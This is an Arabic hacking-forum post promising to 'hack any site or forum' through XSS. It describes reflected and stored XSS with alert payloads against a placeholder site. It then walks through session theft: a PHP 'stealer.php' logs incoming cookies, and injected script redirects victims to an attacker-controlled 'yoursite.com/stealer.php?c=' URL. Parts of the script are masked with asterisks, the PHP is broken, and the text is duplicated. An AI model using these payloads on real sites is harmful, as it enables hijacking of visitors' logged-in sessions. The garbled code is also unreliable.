Saad Ghamdi
New Member
اخترق اي موقع او منتدى مع ثغرة ( xss )
بسم الله الرحمن الرحيم
اليوم نتكلم عن ثغرات ( xss ) وبنتطرق لأهم الأشياء التي يتم استغلالها وتعاريف واشياء مفيده ...
ما هي ثغرات XSS وكيف يتم اختراق الموقع بواسطة هذه الثغره
ان المواقع المصابة بثغرات ( XSS ) هي المواقع التي تستطيع التعديل على محتوى مصدرها و ادخال احد الأكواد التالية :
اي ان ( XSS ) تعني امكانية تعديل محتويات الموقع ، ومعظم هذه الثغرات موجودة في مربعات البحث في المواقع ، وناخذ مثال على ذلك عنوان صفحة بحث في الموقع او في مربعات الكومنز او الرسائل او مربعات ادخال النصوص
يكون الموقع قد كتب في صفح البحث جملة ( نتائج البحث لـ word ) , واذا ادخلنا سكربت جافا في خانة البحث كالتالي :
http://www.infectedsite.com/search.php?q=***************("XSS")</script>word
ستكتب صفحة البحث نتائج البحث لـ ( ***************("XSS")</script>word )
هنا ادرجنا السكريبت في الصفحة و سوف يظهر مربع تنبيه في الصفحة ( XSS )
هذا يعني ان الموقع مصاب بثغرة ( XSS )
لماذا يكون الموقع مصابا بثغرة ( xss )
السبب هو لأن مبرمجي الموقع كسولين جدا لفلترة كلمة البحث من الرموز التالية :
وذلك لمنع إدخال الأكواد التالية :
هناك نوعين من ثغرات (xss )
حيث في مربع التعليق على احد المواقع ، ندخل كود جافا سكريبت كالتالي :
سوف يحفظ التعليق في الصفحة أي سنحفظ كود الجافا سكريبت بشكل دائم بالصفحة
كيف نستطيع اختراق الموقع عن طريق ثغرة ( xss )
هناك الكثير من الطرق لإختراق الموقع عن طريق ثغرات ( XSS ) ، وأهمها سرقة الكوكيز ، طبعا اكيد تحتاج الى استضافة موقع تدعم PHP , ننشئ صفحة PHP كالتالي :
تقوم هذه الصفحة بكتابة الكلمات التي تردها بطريقة ( GET ) الكود :
هذه الصفحة سوف تكتب البيانات التي تردها الى ملف ( *******.txt ) والبيانات التي سنعطيها اياها هي الكوكيز عن طريق ادخال كود جافا سكريبت عن طريق الثغرة مثال في الثغرات المؤقتة في طريقة البحث :
هنا دمجنا السكريبت :
هذا الكود سيحول الضحية الى موقعك و يعطي الصفحة التي ستكتب الكووكيز قيم الكوكيز عن طريق الأمر :
هنا اذا فتحنا الملف
ستجد الككيز للمستخدم مكتوبة فيها
اما في الثغرات الدائمة فيكفي ادخال الكود التالي :
وسبب إدخال الكود السابق لسرقة الكوكيز ، وايضا نستطيع في الثغرات الدائمة ان نحول متصفح الموقع المصاب بالثغرة ( XSS ) ،عن طريق سكريبت :
هذا وصلى الله وسلم على صاحب الجبين الأزهر نبينا محمد وعلى آله وصحبه اجمعين
وعيدكم مبارك وكل سنة وانتوا بصحه وعافية
اليوم نتكلم عن ثغرات ( xss ) وبنتطرق لأهم الأشياء التي يتم استغلالها وتعاريف واشياء مفيده ...
ما هي ثغرات XSS وكيف يتم اختراق الموقع بواسطة هذه الثغره
ان المواقع المصابة بثغرات ( XSS ) هي المواقع التي تستطيع التعديل على محتوى مصدرها و ادخال احد الأكواد التالية :
- javascript
[*]HTML
[*]PHP
اي ان ( XSS ) تعني امكانية تعديل محتويات الموقع ، ومعظم هذه الثغرات موجودة في مربعات البحث في المواقع ، وناخذ مثال على ذلك عنوان صفحة بحث في الموقع او في مربعات الكومنز او الرسائل او مربعات ادخال النصوص
PHP:
www.infectedsite.com/search.php?q=wordيكون الموقع قد كتب في صفح البحث جملة ( نتائج البحث لـ word ) , واذا ادخلنا سكربت جافا في خانة البحث كالتالي :
http://www.infectedsite.com/search.php?q=***************("XSS")</script>word
ستكتب صفحة البحث نتائج البحث لـ ( ***************("XSS")</script>word )
هنا ادرجنا السكريبت في الصفحة و سوف يظهر مربع تنبيه في الصفحة ( XSS )
هذا يعني ان الموقع مصاب بثغرة ( XSS )
لماذا يكون الموقع مصابا بثغرة ( xss )
السبب هو لأن مبرمجي الموقع كسولين جدا لفلترة كلمة البحث من الرموز التالية :
PHP:
#@$%^,.<>- javascript
[*]HTML
[*]PHP
هناك نوعين من ثغرات (xss )
( 1 ) اول نوع وهو النوع الدائم :
يكون هذا النوع غالبا في مربعات الكومنتز و التعليقات .حيث في مربع التعليق على احد المواقع ، ندخل كود جافا سكريبت كالتالي :
PHP:
***************("XSS")</script>سوف يحفظ التعليق في الصفحة أي سنحفظ كود الجافا سكريبت بشكل دائم بالصفحة
( 2 ) النوع المؤقت :
يكون النوع المؤقت غالبا في صفحات البحث حيث لا نستطيع ادراج الكود بشكل دائم و لكن نستطيع إدراجه فقط عن طريق رابط البحث كالتالي :
PHP:
http://www.infectedsite.com/search.php?q=***************("XSS")</script>wordكيف نستطيع اختراق الموقع عن طريق ثغرة ( xss )
هناك الكثير من الطرق لإختراق الموقع عن طريق ثغرات ( XSS ) ، وأهمها سرقة الكوكيز ، طبعا اكيد تحتاج الى استضافة موقع تدعم PHP , ننشئ صفحة PHP كالتالي :
PHP:
stealer.php
كود:
<?php
$data=$_GET["c"]
$f=open("*******.tct","w")
$f.write($data)
$f.close()
?>هذه الصفحة سوف تكتب البيانات التي تردها الى ملف ( *******.txt ) والبيانات التي سنعطيها اياها هي الكوكيز عن طريق ادخال كود جافا سكريبت عن طريق الثغرة مثال في الثغرات المؤقتة في طريقة البحث :
PHP:
http://www.infectedsite.com/search.php?q=******************.location("http://ypursite.com/stealer.php?c="+********.******);</script>هنا دمجنا السكريبت :
PHP:
******************.location("http://yoursite.com/stealer.php?c="+********.location)</script>هذا الكود سيحول الضحية الى موقعك و يعطي الصفحة التي ستكتب الكووكيز قيم الكوكيز عن طريق الأمر :
كود:
******** . ******هنا اذا فتحنا الملف
كود:
http://yoursite.com/*******.txtاما في الثغرات الدائمة فيكفي ادخال الكود التالي :
PHP:
******************.location("http://yoursite.com/stealer.php?c="+********.location)</script>وسبب إدخال الكود السابق لسرقة الكوكيز ، وايضا نستطيع في الثغرات الدائمة ان نحول متصفح الموقع المصاب بالثغرة ( XSS ) ،عن طريق سكريبت :
PHP:
********.locationهذا وصلى الله وسلم على صاحب الجبين الأزهر نبينا محمد وعلى آله وصحبه اجمعين
وعيدكم مبارك وكل سنة وانتوا بصحه وعافية
التعديل الأخير:
اسم الموضوع : اخترق اي موقع او منتدى مع ثغرة ( xss )
|
المصدر : قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات